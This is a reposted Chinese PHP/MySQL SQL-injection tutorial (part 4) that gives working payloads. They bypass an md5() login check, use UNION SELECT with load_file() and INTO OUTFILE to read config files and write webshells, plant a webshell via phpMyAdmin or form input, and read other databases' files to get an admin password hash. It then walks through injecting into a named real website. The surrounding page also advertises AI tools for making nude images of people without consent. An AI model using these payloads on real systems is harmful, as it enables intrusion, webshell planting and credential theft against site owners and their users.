亚洲国产日韩欧美一区二区三区,精品亚洲国产成人av在线,国产99视频精品免视看7,99国产精品久久久久久久成人热,欧美日韩亚洲国产综合乱

Home php教程 php手冊 php注入4

php注入4

Jun 21, 2016 am 09:15 AM
20 mysql nbsp php select

4.??? md5的惡夢
山東大學(xué)的王博士最近可是搞md5搞的紅透了,我們也來搞一搞吧,我們比他更爽,不用計(jì)算,哈哈。
md5我們是有辦法繞過的,但是并不是哪里都可以,php中的md5函數(shù)就不能繞過,因?yàn)槟爿斎氲乃袞|西都在里面,根本跑不出??梢岳@過的是sql語句中的md5。當(dāng)然別的sql中的函數(shù)也是可以繞過的,道理相同哦。
看例子先:
//login.php
......
$query="select * from alphaauthor where UserName=md5($username) and Password= ".$Pw." ";
......
?>
我們直接在瀏覽器提交
http:/login.php?username=char(97,98)) or 1=1 %23
帶入sql語句成為select * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password= ".$Pw."
記得md5里面放的是字符,因?yàn)楹竺嬗衞r 1=2,所以我們隨便放了個(gè)char(97,98).??? Ok,登陸成功了哦!看看,md5在我們面前也沒有什么用處。
5.??? 核心技術(shù),利用php+mysql注入漏洞直接寫入webshell。。
直接利用注入得到webshell,這應(yīng)該是大家都很想的吧,下面就教給你。
這里假設(shè)你已經(jīng)知道了網(wǎng)站所在的物理路徑,我這里假設(shè)網(wǎng)站路徑為c:/apache/htdocs/site。網(wǎng)站的mysql連接信息放在/lib/sql.inc.php里
1)適用于magic_quotes_gpc=Off
假設(shè)我們可以上傳圖片,或者txt,zip,等其它東西,我們把我們的木馬改成
jpg后綴的,上傳后路徑為/upload/2004091201.jpg
2004091201.jpg中的內(nèi)容為
好,我們開始http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( C:/apache/htdocs/site/upload/2004091201.jpg ),4,5,6,7,8,9,10,11%20into%20outfile C:/apache/htdocs/site/shell.php
因?yàn)檫m用了outfile,所以網(wǎng)頁顯示不正常,但是我們的任務(wù)是完成了。
如圖28
我們趕快去看看http://localhost/site/shell.php?cmd=dir
如圖29

爽否?Webshell我們已經(jīng)創(chuàng)建成功了??吹阶钋懊娴?2了沒?那就是我們select 1,2所輸出的!
2)下面再講一個(gè)適用于magic_quotes_gpc=On的時(shí)候保存webshell的方法哦,顯然肯定也能用在于magic_quotes_gpc=Off的時(shí)候啦。
我們直接讀他的配置文件,用技巧2介紹的方法
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)
,4,5,6,7,8,9,10,11
得到sql.inc.php內(nèi)容為

好了我們知道了mysql的root密碼了,我們找到phpmyadmin的后臺(tái)
http://localhost/phpmyadmin/
用root密碼為空登陸。
如圖30
然后我們新建立一個(gè)表結(jié)構(gòu)內(nèi)容如下:

#
# 數(shù)據(jù)表的結(jié)構(gòu) `te`
#
CREATE TABLE te (
? cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# 導(dǎo)出下面的數(shù)據(jù)庫內(nèi)容 `te`
#
INSERT INTO te VALUES ( );
Ok,是我們用select * from table into outfile 的時(shí)候了
直接在phpmyadmin的sql輸入
SELECT * FROM `te` into outfile C:/apache/htdocs/site/cmd1.php ;
如圖31

Ok,成功執(zhí)行,我們?nèi)ttp://localhost/site/cmd1.php?cmd=dir看看效果去
如圖32

好爽的一個(gè)webshell是吧!哈哈,我也很喜歡。
不過不知道大家有沒有發(fā)現(xiàn)我們是在magic_quotes_gpc=On的情況下完成這項(xiàng)工作的,竟然在phpmyadmin里可以不用考慮引號的限制,哈哈,說明什么?說明phpmyadmin太偉大了,這也就是我們在談magic_quotes_gpc=On繞過時(shí)所賣的那個(gè)關(guān)子啦!
6.發(fā)現(xiàn)沒有我們還可以利用update和insert來插入我們的數(shù)據(jù),然后來得到我們的webshell哦,還用上面的那個(gè)例子,
//reg.php
......
$query = "INSERT INTO members
VALUES( $id , $login , $pass , $email , 2 )" ;
......
?>
我們在email的地方輸入
假設(shè)我們注冊后的id為10
那么我們可以再找到一個(gè)可以注入的地方
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile C:/apache/htdocs/site/test.php
好了,我們又有了我們的wenshell了哦。
7.mysql的跨庫查詢
大家是不是一直聽說mysql不能跨庫查詢啊,哈哈,今天我將要教大家一個(gè)好方法,通過這個(gè)方法來實(shí)現(xiàn)變相的跨庫查詢,方法就是通過load_file來直接讀出mysql中dat

a文件夾下的文件內(nèi)容,從而實(shí)現(xiàn)變態(tài)跨庫查詢。
舉個(gè)例子啦
在這之前我們先講一下mysql的data文件夾下的結(jié)構(gòu)
Data文件夾下有按數(shù)據(jù)庫名生成的文件夾,文件夾下按照表名生成三個(gè)后綴為frm,myd,myi的三個(gè)文件,例如
Mysql中有alpha數(shù)據(jù)庫,在alpha庫中有alphaauthor和alphadb兩個(gè)表,
Alpha文件夾內(nèi)容如下圖33

其中alphadb.frm放著lphadb表中的數(shù)據(jù),alphadb.frm放著表的結(jié)構(gòu),alphadb.myi中放的內(nèi)容隨mysql的版本不通會(huì)有所不同,具體可以自己用記事本打開來判斷。
實(shí)驗(yàn)開始
假設(shè)我們知道有另外的一個(gè)數(shù)據(jù)庫yminfo210存在,且存在表user,user中放這admin的信息。
我們
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( yminfo210/user.myd ),4,5,6,7,8,9,10,11
說明一下,load_file默認(rèn)所在的目錄是mysql下的data目錄,所以我們用
load_file( yminfo210/user.myd ),當(dāng)然load_file( .info210/user.myd )也是一樣的,注意的是into outfile的默認(rèn)路徑是在所在的數(shù)據(jù)庫文件夾下。

結(jié)果如圖34

我們看讀出來的內(nèi)容
舼??? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer? http://www.yoursite.com? (?靃?KA靃?靃?? 127.0.0.1? d|??? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd?? ?E麷AM麷A 127.0.0.1 222? 222222223423
雖然亂碼一堆,但是我們還是可以看出用戶名是admin,密碼是698d51a19d8a121ce581499d7b701668,后面其它的是另外的信息。
通過這種方法我們就實(shí)現(xiàn)了曲線跨庫,下面的例子中也會(huì)提到哦!

說了這么多下面我們來具體的使用一次,這次測試的對象是國內(nèi)一著名安全類站點(diǎn)――黑白網(wǎng)絡(luò)
聽人家說黑白有漏洞?我們一起去看看吧。
http://www.heibai.net/down/show.php?id=5403%20and%201=1
正常顯示。
如圖35

http://www.heibai.net/down/show.php?id=5403%20and%201=2
顯示不正常。
如圖36

好,我們繼續(xù)
http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
顯示結(jié)果如下
如圖37

注意看圖中沒有顯示程序名,而且還附帶了
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578

暈了,網(wǎng)站路徑出來了,那可就死定了哦!
我們繼續(xù),直到我們猜到
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
的時(shí)候正常顯示了。
如圖38

好我們轉(zhuǎn)換語句成為
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
顯示如圖39

看看簡介處顯示為12,我們可以猜測此處應(yīng)該為字符型!
Ok,我們下面看看文件內(nèi)容先
D:/web/heibai/down/show.php轉(zhuǎn)化成ascii后為
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,
104,111,119,46,112,104,112)
我們
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,
111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source:是指察看源代碼,至于為什么用,我們后面將講到
顯示出它的源代碼
如圖40

因?yàn)樵趕how.php中有一句

如果我們直接在瀏覽器里提交會(huì)跳轉(zhuǎn)到list.php
我們發(fā)現(xiàn)這句require ("./include/config.inc.php");
好東西,應(yīng)該放這配置文件,ok繼續(xù)
d:/web/heibai/down/include/config.inc.php
轉(zhuǎn)化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105
,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
我們輸入



Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undress AI Tool

Undress AI Tool

Undress images for free

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

PHP Tutorial
1488
72
Beyond the LAMP Stack: PHP's Role in Modern Enterprise Architecture Beyond the LAMP Stack: PHP's Role in Modern Enterprise Architecture Jul 27, 2025 am 04:31 AM

PHPisstillrelevantinmodernenterpriseenvironments.1.ModernPHP(7.xand8.x)offersperformancegains,stricttyping,JITcompilation,andmodernsyntax,makingitsuitableforlarge-scaleapplications.2.PHPintegrateseffectivelyinhybridarchitectures,servingasanAPIgateway

Object-Relational Mapping (ORM) Performance Tuning in PHP Object-Relational Mapping (ORM) Performance Tuning in PHP Jul 29, 2025 am 05:00 AM

Avoid N 1 query problems, reduce the number of database queries by loading associated data in advance; 2. Select only the required fields to avoid loading complete entities to save memory and bandwidth; 3. Use cache strategies reasonably, such as Doctrine's secondary cache or Redis cache high-frequency query results; 4. Optimize the entity life cycle and call clear() regularly to free up memory to prevent memory overflow; 5. Ensure that the database index exists and analyze the generated SQL statements to avoid inefficient queries; 6. Disable automatic change tracking in scenarios where changes are not required, and use arrays or lightweight modes to improve performance. Correct use of ORM requires combining SQL monitoring, caching, batch processing and appropriate optimization to ensure application performance while maintaining development efficiency.

Building Resilient Microservices with PHP and RabbitMQ Building Resilient Microservices with PHP and RabbitMQ Jul 27, 2025 am 04:32 AM

To build a flexible PHP microservice, you need to use RabbitMQ to achieve asynchronous communication, 1. Decouple the service through message queues to avoid cascade failures; 2. Configure persistent queues, persistent messages, release confirmation and manual ACK to ensure reliability; 3. Use exponential backoff retry, TTL and dead letter queue security processing failures; 4. Use tools such as supervisord to protect consumer processes and enable heartbeat mechanisms to ensure service health; and ultimately realize the ability of the system to continuously operate in failures.

Creating Production-Ready Docker Environments for PHP Creating Production-Ready Docker Environments for PHP Jul 27, 2025 am 04:32 AM

Using the correct PHP basic image and configuring a secure, performance-optimized Docker environment is the key to achieving production ready. 1. Select php:8.3-fpm-alpine as the basic image to reduce the attack surface and improve performance; 2. Disable dangerous functions through custom php.ini, turn off error display, and enable Opcache and JIT to enhance security and performance; 3. Use Nginx as the reverse proxy to restrict access to sensitive files and correctly forward PHP requests to PHP-FPM; 4. Use multi-stage optimization images to remove development dependencies, and set up non-root users to run containers; 5. Optional Supervisord to manage multiple processes such as cron; 6. Verify that no sensitive information leakage before deployment

A Deep Dive into PHP's Internal Garbage Collection Mechanism A Deep Dive into PHP's Internal Garbage Collection Mechanism Jul 28, 2025 am 04:44 AM

PHP's garbage collection mechanism is based on reference counting, but circular references need to be processed by a periodic circular garbage collector; 1. Reference count releases memory immediately when there is no reference to the variable; 2. Reference reference causes memory to be unable to be automatically released, and it depends on GC to detect and clean it; 3. GC is triggered when the "possible root" zval reaches the threshold or manually calls gc_collect_cycles(); 4. Long-term running PHP applications should monitor gc_status() and call gc_collect_cycles() in time to avoid memory leakage; 5. Best practices include avoiding circular references, using gc_disable() to optimize performance key areas, and dereference objects through the ORM's clear() method.

Building Immutable Objects in PHP with Readonly Properties Building Immutable Objects in PHP with Readonly Properties Jul 30, 2025 am 05:40 AM

ReadonlypropertiesinPHP8.2canonlybeassignedonceintheconstructororatdeclarationandcannotbemodifiedafterward,enforcingimmutabilityatthelanguagelevel.2.Toachievedeepimmutability,wrapmutabletypeslikearraysinArrayObjectorusecustomimmutablecollectionssucha

The Serverless Revolution: Deploying Scalable PHP Applications with Bref The Serverless Revolution: Deploying Scalable PHP Applications with Bref Jul 28, 2025 am 04:39 AM

Bref enables PHP developers to build scalable, cost-effective applications without managing servers. 1.Bref brings PHP to AWSLambda by providing an optimized PHP runtime layer, supports PHP8.3 and other versions, and seamlessly integrates with frameworks such as Laravel and Symfony; 2. The deployment steps include: installing Bref using Composer, configuring serverless.yml to define functions and events, such as HTTP endpoints and Artisan commands; 3. Execute serverlessdeploy command to complete the deployment, automatically configure APIGateway and generate access URLs; 4. For Lambda restrictions, Bref provides solutions.

python check if key exists in dictionary example python check if key exists in dictionary example Jul 27, 2025 am 03:08 AM

It is recommended to use the in keyword to check whether a key exists in the dictionary, because it is concise, efficient and highly readable; 2. It is not recommended to use the get() method to determine whether the key exists, because it will be misjudged when the key exists but the value is None; 3. You can use the keys() method, but it is redundant, because in defaults to check the key; 4. When you need to get a value and the expected key usually exists, you can use try-except to catch the KeyError exception. The most recommended method is to use the in keyword, which is both safe and efficient, and is not affected by the value of None, which is suitable for most scenarios.

See all articles